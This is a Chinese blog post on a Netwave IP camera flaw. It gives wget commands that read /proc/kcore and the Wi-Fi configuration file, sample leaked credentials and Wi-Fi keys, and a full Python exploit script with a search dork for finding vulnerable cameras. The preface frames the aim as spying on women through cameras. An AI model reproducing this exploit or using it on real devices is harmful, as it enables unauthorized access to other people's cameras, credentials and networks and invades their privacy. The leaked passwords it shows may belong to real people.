Netwave IP Camera Password Disclosure

前言:今早创宇上看到的一篇Netwave摄像头漏洞,然后脑补上帝视角看看妹子,可惜搞完了才发现童话里都是骗人的,木有妹子啊。。。

0x01 简介

Netwave网络摄像头的一个文件下载导致配置信息被泄露。


0x02 分析

主要就是下载配置文件,然后解析配置,这里引用知道创宇的分析

1
2
3
4
wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
wget -qO- http://[HOST]:[PORT]//dev/rom0
wget -qO-http://[HOST]:[PORT]/get_status.cgi

  • get_status.cgi[泄露当前网络摄像头的一些配置信息]

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    var sys_ver='21.37.2.47';  
    var app_ver='0.0.4.19';
    var alias='002voam';
    var now=1486976881;
    var tz=-28800;
    var alarm_status=0;
    var ddns_status=0;
    var ddns_host='';
    var oray_type=0;
    var upnp_status=0;
    var p2p_status=0;
    var p2p_local_port=20409;
    var msn_status=0;
    var wifi_status=0;
    var temperature=0.0;
    var humidity=0;
    var tridro_error='';
  • /etc/RT2870STA.dat[获取SSID与wifi密码的配置文件]

    1
    2
    3
    4
    5
    6
    7
    [Default]
    SSID=hang yue office
    NetworkType=Infra
    Channel=0
    AuthMode=WPA2PSK
    EncrypType=AES
    WPAPSK=hangyuewifi
  • /proc/kcore[内存的map, (下载之前需要注意把wget进程结束才可以登录)。]

    1
    2
    3
    4
    5
    6
    000DC5D9ADF4
    IPCam
    admin
    Apex27212600
    john
    ...

0x03 Poc&Exp

exploits上已经公开了源码,简单的做了点修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
# -*- coding:utf-8 -*-
# !/usr/bin/env python
# Desc: Netwave IP Camera Password Disclosure
# Dork: Netwave IP camera http config | "Server: Netwave IP Camera"
# Referer: http://paper.seebug.org/225/


import sys, os, time, urllib2, requests, subprocess, signal

try:
import tailer
except:
print " [+] Please sudo pip install tailer first"


class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'


class Scanner(object):
def __init__(self, url):
self.url = url
self.macaddr = ""
self.done = 0
self.linecount = 0

def signal_handler(signal, frame):
print('\nclearing up..')
os.system("rm -rf tmpstream.txt")
os.system("rm -rf tmpstrings.out")
os.system("killall -9 wget")
os.system("killall -9 tail")
sys.exit(0)

def mac(self):
print self.url
try:
r = requests.get('http://' + self.url + '/get_status.cgi')
content = r.content.split(";\n")
for line in content:
if line.startswith("var id="):
line = line.split("'")
self.macaddr = line[1]
else:
pass
except:
pass
return self.macaddr

def wifi(self):
try:
r = requests.get("http://" + self.url + "//etc/RT2870STA.dat")
content = r.content.split("\n")
for line in content:
if line.startswith("WPAPSK") or line.startswith("SSID"):
print "\t\t" + bcolors.OKGREEN + str(line) + bcolors.ENDC
else:
print "\t\t" + str(line)
except:
print "[+] Wireless Lan Disabled"
return ""

def memory(self):
try:
urllib2.urlopen('http://' + self.url + '//proc/kcore')
except:
print bcolors.FAIL + "[+]VulnInfo: Not found vuln,and exiting.." + bcolors.ENDC
sys.exit(0)
return bcolors.WARNING + "Found vuln,Please wait for some minutes to dump.." + bcolors.ENDC

def dump(self):
proc = subprocess.Popen("wget -qO- http://" + sys.argv[1] + "//proc/kcore > tmpstream.txt", shell=True,
preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD + "hit CTRL+C to exit.." + bcolors.ENDC
while 1:
sys.stdout.flush()
if os.stat('tmpstrings.out').st_size <= 1024:
sys.stdout.write("binary data: " + str(os.stat('tmpstream.txt').st_size) + "\r")
else:
sys.stdout.flush()
print "strings in binary data found.. password should be around line 10000"
for line in tailer.follow(open('tmpstrings.out', 'r')):
sys.stdout.flush()
if self.done == 0:
self.linecount += 1
if line == self.macaddr:
sys.stdout.flush()
self.done = 1
print bcolors.OKGREEN + "\n\nmac address triggered.. printing the following dumps, could leak username and passwords.." + bcolors.ENDC
else:
sys.stdout.write(str(self.linecount) + "\r")
elif self.done == 1:
self.done = 2
print "\nfirstline: " + bcolors.OKGREEN + line + bcolors.ENDC
elif self.done == 2:
self.done = 3
print "username: " + bcolors.OKGREEN + line + bcolors.ENDC
elif self.done == 3:
self.done = 4
print "password: " + bcolors.OKGREEN + line + bcolors.ENDC
elif self.done == 4:
self.done = 0
print "following line: \n\n" + bcolors.OKGREEN + line + bcolors.ENDC
else:
pass

def scan(self):
signal.signal(signal.SIGINT, self.signal_handler)
print "[+]SystemInfo:\n\t\tMac-Address=" + bcolors.OKGREEN + str(self.mac()) + bcolors.ENDC
print
print "[+]WifiInfo:\n", self.wifi()
print
print "[+]VulnInfo:\n\t\t", self.memory()
self.dump()

if __name__ == '__main__':
if len(sys.argv) == 1:
print '[+]Usage: python Netwave_IP_Camera.py [HOST]:[PORT]'
sys.exit(0)
dota = Scanner(sys.argv[1])
dota.scan()
signal.pause()


PS:使用过程中如果要访问目标站记得把代码停掉,如果解析密码时候时间过长停下来然后清空wget进程重新运行即可不,这种摄像头发现很多都是用在商业之类上的,还没有语音对话功能,也不能吓人,没意思= =。
附件

文章目录
  1. 1. 0x01 简介
  2. 2. 0x02 分析
  3. 3. 0x03 Poc&Exp